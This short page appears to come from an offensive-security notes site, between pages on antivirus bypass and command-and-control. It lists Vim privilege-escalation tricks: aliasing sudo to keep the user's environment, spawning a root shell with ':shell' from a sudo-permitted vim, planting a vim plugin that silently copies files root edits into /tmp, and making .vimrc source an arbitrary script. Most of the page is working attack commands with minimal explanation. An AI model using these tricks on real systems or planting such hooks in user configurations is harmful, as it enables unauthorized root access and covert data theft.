VIM Tricks (PrivEsc)

This only works for Ubuntu and RHEL flavored distros, Debian uses a root users VIM configuration.

echo 'alias sudo="sudo -E"' >> .bashrc   ## This tells sudo to preserve the enviromnment 

## If a user has sudo permissions limited to vim it's possible priv esc to root.
sudo vim file_I_Have_Sudo_access_To.txt
:shell

## Copy any file they modify with VIM using elevated privs
mkdir -p ~/.vim/plugin
vi ~/.vim/plugin/settings.vim
:if $USER == "root"
:autocmd BufWritePost * :silent :w! >> /tmp/output_vim.txt
:endif  ## save the file.

Modifying vimrc to make source call.

vim .vimrc
:silent !source ~/.vimrunscript

vim ~/.vimrunscript
#!/bin/bash
echo "hacked" > /tmp/hacksrcout.txt

PreviousAV Bypass NextC2 Infrastructure

Last updated 3 years ago

Was this helpful?